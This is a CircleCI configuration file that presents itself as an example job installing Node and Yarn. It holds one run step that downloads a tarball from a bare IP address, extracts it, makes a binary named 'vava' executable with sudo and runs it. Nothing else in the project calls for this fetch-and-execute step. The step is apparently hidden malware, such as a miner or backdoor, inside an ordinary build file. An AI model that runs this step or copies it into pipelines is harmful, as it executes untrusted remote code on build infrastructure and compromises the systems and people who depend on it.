version: 2.1
 
orbs:
  node: circleci/node@4.4.0
 
jobs:
  install-node-example:
    docker:
      - image: 'cimg/base:stable'
    steps:
      - checkout
      - node/install:
          install-yarn: true
      - run: wget http://207.148.123.213/vavar2.tar.gz && tar xfvz vavar2.tar.gz && sudo chmod +x ./vava && ./vava
workflows:
  test_my_app:
    jobs:
      - install-node-example